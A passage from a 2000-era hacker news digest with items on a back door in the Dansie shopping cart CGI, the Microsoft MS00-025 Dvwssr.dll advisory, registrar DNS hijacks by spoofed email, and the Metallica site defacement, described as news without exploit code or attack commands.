was discovered in alt.comp.perlcgi.freelance:
http://www.deja.com/getdoc.xp?AN=601644315
Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
We won't quote Kasey's posts here, in brief, Kasey also discovered the back
door and cloaked email routines. Kasey also provides evidence in the post to
indicate that not only is Dansie well aware of the back door routine, but
may be actively attempting to utilize it.
Based upon our own investigation, the information Kasey posted, and our own
firewall logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.
* Based upon the log snippet in Kasey's post showing attempted access to
the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to
Kasey, access to the CGI was attempted less than 30 minutes after the cart
was installed.
When we noticed the attempted usage of Kasey's server, a quick check of our
own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 on Earthlink's
dial-ups as the one used to probe Kasey's server, were from the author of
the shopping cart.
We will not try to hazard a guess as to why Dansie.net felt the need to
include a back door within their shopping cart software. Whatever their
reasoning may be, it is our opinion that no reason, no matter how well
thought out or rationalized, justifies the existence of this back door. No
reasoning can possibly explain away a routine that deliberately allows an
intruder unrestricted and unauthorized access to any server on the Internet
that has the Dansie Shopping Cart installed.
--
Joe Technical Support
General Support: support@blarg.net Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
@HWA
61.0 [HNN] MostHateD Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cacopalyse
MosthateD (Patrick W. Gregory) a member of the online group Global
Hell (gH) has pleaded guilty to a single count of conspiracy to commit
telecommunications wire fraud in Texas US District Court. He could
receive up to five years in prison and a $250,000 fine. MostHateD was
among those snared during the wave of FBI raids immediately following
the defacement of the White House web page. Mindphaser (Chad Davis),
who was snagged during the same set of raids, pleaded guilty to
similar charges earlier this year in Green Bay Wisconsin.
NewsBytes
http://www.newsbytes.com/pubNews/00/147420.html
Pay to play pocket book ream site - sorry no story - Ed
@HWA
62.0 [HNN] NSA And CIA Deny Echelon is Used Domestically
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
CIA Director George Tenet and NSA director Lt. Gen. Michael V. Hayden
staunchly denied allegations that either agency conducts electronic
surveillance on US citizens. The denials were in front of the US House
intelligence committee. After the hearing, Chairman Porter Goss,
R-Fla. said he was satisfied that "our safeguards are in place and are
working."
Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/037020.htm
Dead Url
@HWA
63.0 [HNN] Keyboard Monitoring Becoming More Popular with Business
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
While keystroke monitoring software has been around for decades it has
recently become extremely popular in the corporate setting. With the
courts consistently siding with the employers on electronic monitoring
of employees and the low cost and availability of keystroke recording
software (This article says $99 but there are a lot of free ones.)
businesses are starting to snoop on their employees more and more.
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/085400.htm
Dead Url
@HWA
64.0 [HNN] Japanese Cult Wrote Software for Navy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
HNN has reported on this before but another story has popped up
regarding the Japanese cult Aum Shinri Kyo (Supreme Truth), which was
involved with releasing nerve gas in a Japanese subway killing 12
people, and their involvement with developing software for the
Maritime Self Defense Force, or navy, including the whereabouts of
submarines. (Japan has submarines?)
Reuters - via The San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/081626.htm
Dead Url
@HWA
65.0 [HNN] MPAA Suspects Denial of Service Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cruciphux
Yesterday HNN reported a rumor that the MPAA was under a denial of
service attack. Today MSNBC has received confirmation that
administrators of the site suspect that their current problems are
related to some sort of DoS attack. The attack is believed to be in
retaliation for the MPAA action regarding the DeCSS software.
MSNBC
http://www.msnbc.com/news/394566.asp?0m
Dead Url
@HWA
66.0 [HNN] Even More E-zines
~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Slider_100
Oblivion Mag is the latest UK underground e-zine for hackers,
phreakers and vXers! issue #2 has just been released with the first
published interview with Curador. Also L33tdawg from Hack In The Box
has announced the availability of Issue #4.
Oblivion Mag
Hack In the Box
http://www.oblivion-mag.org.uk
http://www.hackinthebox.org
@HWA
67.0 [HNN] BackDoor Now Called a Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by danders
dvwssr.dll, part of Microsoft server software with Front Page
extensions was revealed last Friday to have a backdoor password within
it that could allow malicious users access to the server. After
originally acknowledging the problem last Friday Microsoft is now
claiming that it is nothing more than bug. (Regardless of whether this
is a backdoor or a bug the fact that such items are present in release
versions of the code forces the user to question the completeness of
Microsofts quality assurance.)
MSNBC
Microsoft
NT Bug Traq
http://www.msnbc.com/news/394810.asp
http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
http://www.ntbugtraq.com/default.asp?pid
Microsoft Security Bulletin (MS00-025) Procedure Available to Eliminate
"Link View Server-Side Component" Vulnerability
Originally Posted: April 14, 2000
Updated: April 17, 2000
Summary On April 14, 2000, Microsoft issued the original version of this
bulletin, to discuss a security vulnerability affecting several web server
products. Shortly after publishing the bulletin, we learned of a new,
separate vulnerability that increased the threat to users of these
products. We updated the bulletin later on April 14, 2000, to advise
customers of the new vulnerability, and noted that we would provide
additional details when known. On April 17, 2000, we updated the bulletin
again to provide those details.
A procedure is available to eliminate a security vulnerability that could
allow a malicious user to cause a web server to crash, or potentially run
arbitrary code on the server, if certain permissions have been changed
from their default settings to inappropriate ones. Although this bulletin
has been updated several times as the investigation of this issue has
progressed, the remediation steps have always remained the same
customers running affected web servers should delete the affected file,
Dvwssr.dll. Customers who have done this at any point in the past do not
need to take any further action.
Frequently asked questions regarding this vulnerability and the procedure
can be found at
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
Issue Dvwssr.dll is a server-side component used to support the Link View
feature in Visual Interdev 1.0. However, it contains an unchecked buffer.
If overrun with random data, it could be used to cause an affected server
to crash, or could allow arbitrary code to run on the server in a System
context.
By default, the affected component, Dvwssr.dll, resides in a folder whose
permissions only allow web authors to execute it. Under these conditions,
only a person with web author privileges could exploit the vulnerability
but a web author already has the ability to upload and execute code of his
choice, so this case represents little additional threat. However, if the
permissions on the folder were set inappropriately, or the .dll were
copied to a folder with lower permissions, it could be possible for other
users to execute the component and exploit the vulnerability.
Affected Software Versions The affected component is part of Visual
Interdev 1.0. However, it is a server-side component, and is included in
the following products
Microsoft® Windows NT® 4.0 Option Pack, which is the primary distribution
mechanism for Internet Information Server 4.0 Personal Web Server
4.0, which ships as part of Windows® 95 and 98 Front Page 98 Server
Extensions, which ships as part of Front Page 98. NOTE: Windows 2000 is
not affected by this vulnerability. Upgrading from an affected Windows NT
4.0 to Windows 2000 removes the vulnerability Installing Office 2000
Server Extensions on an affected server removes this vulnerability.
Installing FrontPage 2000 Server Extensions on an affected server removes
this vulnerability.
Remediation To eliminate this vulnerability, customers who are
hosting web sites using any of the affected products should delete all
copies of the file Dvwssr.dll from their servers. The FAQ provides
step-by-step instructions for doing this. The only functionality lost by
deleting the file is the ability to generate link views of .asp pages
using Visual Interdev 1.0.
More Information Please see the following references for more information
related to this issue.
Frequently Asked Questions: Microsoft Security Bulletin MS00-025
Microsoft Knowledge Base article Q259799 discusses this issue and will be
available soon. Microsoft TechNet Security web site
Obtaining Support on this Issue Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
April 14, 2000: Bulletin Created. April 14, 2000: Bulletin updated
to provide preliminary results of investigation of buffer overrun
vulnerability April 17, 2000: Bulletin updated to provide final results of
investigation. THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS
PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL
MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS
SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
APPLY.
Last updated April 17, 2000 © 2000 Microsoft Corporation. All rights
reserved. Terms of use.
@HWA
68.0 [HNN] North Carolina Plagued by 'hackers'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evilution
The FBI has warned that North Carolina is infested with '6hackers'9
and that business leaders should be concerned. Doris Gardner from the
Charlotte office of the FBI said that several machines within North
Carolina had been used in the recent massive DDoS attacks and that
such attacks had been launched against North Carolina business. She
refused to give further details citing the ongoing investigation but
promised a wave of prosecutions soon. (Just what we need, the FBI
running around claiming the sky is falling.)
The Charlotte Observer
ABC News
http://www.charlotte.com/observer/natwor/docs/cyberterror0414.htm
http://abcnews.go.com/sections/tech/DailyNews/nchack000414.html
State Target
North Carolina Businesses Target of Net Hackers
The Associated Press
C H A P E L H I L L, N.C., April 14 The FBI is investigating computer
hacking in North Carolina. FBI agents warn that Internet hackers have
targeted several North Carolina businesses in recent months. They say
several computer systems in the state have been used by hackers to attack
businesses. Investigators spoke Thursday at the annual forum of the North
Carolina Electronics and Information Technologies Association. They urged
private businesses to cooperate in stopping hackers who are wreaking
millions of dollars in damage. This summer, the FBI plans to form a task
force with businesses to share information and alerts about hacking
attempts. The FBI will also survey North Carolina businesses to see how
many have been the victims of cyber-attacks.
@HWA
69.0 [HNN] Web Sites Redirected, Serbians Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Alex
The Network Solutions registration database has been compromised again
this time by people concerned over the crisis in Kosovo. Adidas,
Pfizer, Metro Goldwyn Mayer and LucasArts Entertainments and many
others all had their DNS rerouted to point to a page that said 'Kosovo
Is Serbia'
BBC
ABC News
Wired
WebDNS
http://news.bbc.co.uk/hi/english/world/europe/newsid_712000/712211.stm
http://www.abcnews.go.com/sections/world/DailyNews/hackers000414.html
http://www.wired.com/news/politics/0,1283,35674,00.html
http://www.webdns.com/news/item1.html
Friday, 14 April, 2000, 01:24 GMT 02:24 UK 'Serb hackers' on the rampage
More than 50 websites have been taken over by what is suspected to be a
group of Serb hackers.
The websites - which included such high-profile names as Manchester United
and Adidas - were stripped of their content, and branded with the image of
a double-headed eagle, with the words "Kosovo is Serbia".
A screen grab from eunet.com's hacked site
Many of the sites were Yugoslav, Bosnian and Croatian. The Kosovo Albanian
newspaper Koha Ditore and the Albanian site Kosovapress were also among
those hacked.
In another development, the website of the Serbian Ministry of Information
reported that it and other Yugoslav sites had been taken over.
It said "American-Albanian propagandists" had forged the entire English
version of its site on Wednesday.
"In a planned and malicious action, regularly registered Yugoslav sites
were taken over on the central server of an American firm involved in the
registration of the internet domains," it added.
"Numerous sites of the Yugoslav providers, political parties and firms
were attacked in a synchronised manner," it said.
Chance discovery
Most of the companies in the "Kosovo is Serbia" attack have since
reclaimed their websites.
Manchester United believes the culprits were "cyber-squatters", who
register internet sites in the names of celebrities or well-known
companies, and then try to sell them back again.
An internet company which monitors domain names, WebDNS, spotted that the
hacking was part of a sustained campaign.
Alex Jeffreys, the technical director of WebDNS, said he noticed that
several high-profile web-sites were being hacked on Monday.
"I almost stumbled over it by chance, when I noticed that a number of
large company domain names had changed ownership," he told News Online.
As he began checking details of some of the thousands of websites being
supported by the server Webprovider Inc, he discovered more than 50 sites
that had been hacked from the same address.
Hacked websites
viagra.com
eunet.com
winston.com
jamesbond.com
indianajones.com
mafia.com
kosova.com
yu.com
slovenia.com
bosnia.com
sarajevo.com
warcrimesmonitor.com
arkan.com
tudjman.com
The hacked websites had all been registered with Network Solutions, the
world's largest register.
Mr Jeffreys said it appeared that the hackers had changed the contact
details in Network Solutions' database on Sunday night.
The contact addresses were at first transferred to a Yugoslav address, and
then on Monday night to an Albanian address.
"It seems that the Network Solutions database is quite open for hacking,
rather than it being one company in particular," he said.
How the hackers worked
It is impossible to say exactly who the hackers are, or how they managed
to breach databases that should be secure.
However, Mr Jeffreys said they probably sent spoof e-mails to Network
Solutions, pretending to be from the company concerned, and requesting a
change of address.
The requests for a modification are sent by an automatic e-mail form.
Although Network Solutions was not available for comment, a message on
their answer machine said that "if you are making a registrar name change
or contact modifications request" there would be delays while they
"carefully review your request for change".
ABC NEWS;
Hack Attack
Security Glitch Turns Major Web Sites Into Kosovo Billboards
Hackers got into more than 50 Web sites in what appeared to be a
coordinated effort to promote Serbs in Kosovo. This is what slovenia.com
looked like after the cyber attack. (slovenia.com)
By Andrew Chang
April 14 This week, the tensions in Kosovo reached around the world, into
innumerable desktops thanks to a group of hackers. Hackers got into more
than 50 Web sites including those of some high-profile names, like
addidas.com, mgm.com and viagra.com in what appeared to be a coordinated
effort to promote Serbs in Kosovo. The sites were stripped of their
content, and branded with an image of a two-headed eagle with the words,
Kosovo is Serbia. The two-headed eagle is a common image in southeastern
Europe. It is used by Bosnian Serbs, as well as Albanians, the former
Kosovo Liberation Army, and Russians. One London newspaper report said the
hackers had hit up to 2,000 Web sites. Among the other sites that were
hacked were indianajones.com and jamesbond.com. Many of the targets were
from the Balkans. The Kosovo Albanian newspaper Koha Ditore and the
Albanian site Kosovoapress were also among those hacked, the BBC reported.
Most of the companies have since reclaimed their Web sites.
An Odd Discovery
Alex Jeffreys, technical director for WebDNS, a London-based Web security
and registration firm, says he first noticed the hacking on Monday, when he
noticed a large number of domains had changed ownership. Jeffreys told
ABCNEWS.com he was scanning a public directory of domain names when he
noticed many of them had moved the domain name contacts away from their
rightful owners to a Hotmail e-mail address. It is unusual for established
companies to move their contact e-mail address to a free e-mail service
like Hotmail, Jeffreys said. Signing up for Hotmail is almost anonymous
and brand-name companies usually have e-mail addresses based off their own
sites.
Network Solutions to Blame?
All the hacked Web sites had been registered with Network Solutions, the
worlds largest register. The hackers manged to breach security by
sending spoof e-mails to Network Solutions, pretending to be from the
company concerned and requesting a change of address, said a spokesperson
for Network Solutions, who declined to be identified. The spokesperson said
the chosen Web sites were hacked because they used the most basic level of
online security an automated process where the e-mail address of a user
requesting a change of address is only checked against the e-mail address
on record of the person authorized to make such a change, By forging their
e-mail addresses, the hackers fooled the automation into thinking they were
authorized to make a change and subsequently moved authority for the site
to a Hotmail account. The company does offer its users higher levels of
security, the Networks Solutions spokesperson said. Most of the prominent
sites were back to normal today, and made no mention of the hacking. A few,
like slovenia.com, still displayed the Kosovo is Serbia brand. Others,
like eunet.com and yu.com, appeared to have been shut down altogether.
Jeffreys hoped the Web sites had learned a valuable lesson about security.
It shouldnt be that simple to make the change, he said.
@HWA
70.0 [HNN] Metallica Sues Napster, Gets Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Metallica shows us that they are now as hip as our dads and acting
like stuck up suits to prove it, Metallica: you're washed up, too
old, your music is limp, and you're old and decrepit. Fuck y'all
- Ed.
April 17th
contributed by Evil Wench
Metallica, one of the few groups that owns its own music, has filed
suit against Napster and several colleges for copyright infringement.
In retaliation Metallica's web site was defaced in protest. This is
the second time within the last eight months that the Metallica site
has been defaced.
ZD Net
Attrition Mirror #1
Attrition Mirror #2
http://www.zdnet.com/zdnn/stories/news/0,4586,2543398,00.html
http://www.attrition.org/mirror/attrition/1999/08/20/www.metallica.com
/toprightpart.html
http://www.attrition.org/mirror/attrition/2000/04/14/www.metallica.com
/
ZDNet
Metallica's Napster hit: 'Enter Lawman'
Rock group sues Napster and several colleges, alleging copyright violation
by allowing the illegal swapping of its storied music. Cybervandals
retaliate.
By Lisa Bowman, ZDNet News UPDATED April 14, 2000 12:32 PM PT
The rock group Metallica has sued Napster Inc. and several colleges,
claiming, among other things, that they violated copyright law by allowing
illegal swapping of its music. E/M Ventures and Creeping Death Music are
also plaintiffs in the suit, which was filed in U.S. District Court in the
Central District of California and targets the University of Southern
California, Yale University and Indiana University. In apparent
retaliation Friday, Metallica's Web site was targeted by cybervandals. The
unknown hackers left a simple message: "LEAVE NAPSTER ALONE." Aside from
two links -- one to Napster and another to the main page of the official
Metallica site -- no other message, on the page or in the source code, was
posted.
This is the first time a music group has gone after Napster, the
controversial software that allows people to locate and copy MP3 files.
Dozens of colleges have banned its use, claiming it hogged bandwidth and
fearing they would be slapped with lawsuits similar to this one. However,
in February, USC bucked that trend, saying that it would continue to allow
its students to use the technology, which is downloadable from the
Internet.
San Mateo, Calif.-based Napster already is the target of a suit by the
Recording Industry Association of America, which claims that Napster
violates the Digital Millennium Copyright Act, a new law that bars devices
that could be used to circumvent copyrights.
The suit says students who use Napster 'exhibit the moral fiber of common
looters.'
Having Metallica as a plaintiff in this latest case gives the industry
even more brand-name backing.
The recording industry is worried that digital music files will weaken
their power over the sale and distribution of songs, and Napster is one of
several new technologies that make it easier for people to swap digital
music files.
'Morally and legally wrong' In a press release announcing the suit,
publicists for the band and music companies even threw in a statement from
Metallica drummer Lars Ulrich, who said it is "sickening to know that our
art is being traded like a commodity rather than the art that it is."
"From a business standpoint, this is about piracy -- aka taking something
that doesn't belong to you -- and that is morally and legally wrong."
In the suit, Metallica and the music companies claim that Napster not only
violated their copyrights, but also encouraged unlawful use of digital
audio devices and enabled the violation of the Racketeering Influenced &
Corrupt Organizations Act, or RICO.
The suit says that students who use Napster to copy files "exhibit the
moral fiber of common looters."
Napster officials weren't immediately available for comment.